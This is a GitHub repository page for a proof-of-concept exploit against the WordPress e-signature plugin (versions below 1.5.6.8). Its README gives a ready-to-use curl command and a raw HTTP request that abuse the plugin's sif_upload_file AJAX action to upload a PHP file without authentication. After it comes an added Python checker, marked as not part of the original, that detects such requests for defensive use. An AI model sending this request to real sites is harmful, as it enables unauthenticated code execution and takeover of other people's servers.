https://github.com/randomrobbiebf/e-signature-poc
e-signature < 1.5.6.8 - Unauthenticated Remote Code Execution
- Host: GitHub
- URL: https://github.com/randomrobbiebf/e-signature-poc
- Owner: RandomRobbieBF
- Created: 2023-06-15T12:30:53.000Z (almost 3 years ago)
- Default Branch: main
- Last Pushed: 2023-06-15T12:36:51.000Z (almost 3 years ago)
- Last Synced: 2025-01-21T05:41:43.657Z (over 1 year ago)
- Size: 1.95 KB
- Stars: 0
- Watchers: 2
- Forks: 0
- Open Issues: 0
Metadata Files:
- Readme: README.md
README
# e-signature-poc
e-signature < 1.5.6.8 - Unauthenticated Remote Code Execution
Curl
---
```
curl "http://wordpress.lan/wp-admin/admin-ajax.php?action=sif_upload_file" -X POST -H "Content-Type: multipart/form-data" -F "file=@test.php" -F "extensions=jpg,png,pdf,php" -F "filesize=2" -F "sif_name=example_file"
```
RAW_HTTP
---
```
POST /wp-admin/admin-ajax.php?action=sif_upload_file HTTP/1.1
Host: wordpress.lan
User-Agent: curl/7.88.1
Accept: */*
Content-Length: 544
Content-Type: multipart/form-data; boundary=------------------------04406918fd5cbc2b
Connection: close

--------------------------04406918fd5cbc2b
Content-Disposition: form-data; name="file"; filename="test.php3"
Content-Type: application/octet-stream

--------------------------04406918fd5cbc2b
Content-Disposition: form-data; name="extensions"

jpg,png,pdf,php3
--------------------------04406918fd5cbc2b
Content-Disposition: form-data; name="filesize"

2
--------------------------04406918fd5cbc2b
Content-Disposition: form-data; name="sif_name"

example_file3
--------------------------04406918fd5cbc2b--
```
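
A defender-side check for the request shape shown above, as an added example that is not part of the original PoC repository: it parses a captured POST to `admin-ajax.php` and flags the two tells in this request, a client-supplied `extensions` allow-list that names a script extension and an uploaded filename that carries one. The `SCRIPT_EXTS` list, the function names and the sample body are assumptions constructed for illustration.

```python
import email
from urllib.parse import parse_qs, urlsplit

# Extensions PHP-enabled servers commonly execute (assumed list; tune per site).
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht"}

def parse_multipart(content_type, body):
    """Return {field name: (filename or None, value bytes)} for a form-data body."""
    raw = b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body
    msg = email.message_from_bytes(raw)
    fields = {}
    for part in (msg.get_payload() if msg.is_multipart() else []):
        name = part.get_param("name", header="content-disposition")
        fields[name] = (part.get_filename(), part.get_payload(decode=True) or b"")
    return fields

def flag_upload(target, content_type, body):
    """Return findings for one POST request; an empty list means no match."""
    url = urlsplit(target)
    action = parse_qs(url.query).get("action", [])
    if not url.path.endswith("/wp-admin/admin-ajax.php") or "sif_upload_file" not in action:
        return []
    fields = parse_multipart(content_type, body)
    findings = []
    # 1. The client, not the server, names the permitted extensions.
    allowed = fields.get("extensions", (None, b""))[1].decode(errors="replace")
    bad = sorted({e.strip().lower() for e in allowed.split(",")} & SCRIPT_EXTS)
    if bad:
        findings.append("client-supplied allow-list contains: " + ",".join(bad))
    # 2. The uploaded file itself carries a script extension.
    filename = fields.get("file", (None, b""))[0] or ""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext in SCRIPT_EXTS:
        findings.append("uploaded filename has script extension: " + filename)
    return findings

# Constructed sample in the shape of the request above; file body is a placeholder.
BOUNDARY = "x-sample-boundary"
CTYPE = "multipart/form-data; boundary=" + BOUNDARY
SAMPLE = (
    "--{b}\r\n"
    'Content-Disposition: form-data; name="file"; filename="test.php3"\r\n'
    "Content-Type: application/octet-stream\r\n\r\nplaceholder\r\n"
    "--{b}\r\n"
    'Content-Disposition: form-data; name="extensions"\r\n\r\njpg,png,pdf,php3\r\n'
    "--{b}--\r\n"
).format(b=BOUNDARY).encode()

if __name__ == "__main__":
    print("\n".join(flag_upload("/wp-admin/admin-ajax.php?action=sif_upload_file", CTYPE, SAMPLE)))
```

The check needs the request body, so it belongs where bodies are visible (a WAF, reverse proxy or packet capture); a plain access log only shows the `action=sif_upload_file` query string.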